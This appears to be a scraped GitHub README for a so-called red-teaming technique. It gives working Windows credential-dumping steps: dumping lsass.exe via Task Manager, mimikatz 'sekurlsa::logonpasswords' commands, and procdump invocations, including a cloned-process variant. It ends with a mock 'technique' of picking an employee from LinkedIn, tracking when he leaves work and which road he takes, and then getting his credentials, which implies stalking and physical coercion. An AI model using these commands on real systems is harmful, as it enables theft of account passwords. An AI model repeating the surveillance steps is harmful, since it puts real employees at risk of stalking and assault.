Skip to content

abdoghazy2015/the_new_redteaming_technique

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 

Repository files navigation

the_new_redteaming_technique

First OF all, Create a minidump of the lsass.exe using task manager (must be running as administrator):

alt text

alt text

Second , Swtich mimikatz context to the minidump:

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP sekurlsa::logonpasswords

alt text

Now it's a time for Procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

// or avoid reading lsass by dumping a cloned lsass process
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

alt text

alt text

After doing all of the above steps, you need to do the following steps:

1- try to figure the needed employee from Linkedin profile of the company

alt text

2- try to know when the employee will leave the work and which road he will take

alt text

3- use this technique to get his creds

alt text

PS : all screen shots are from https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published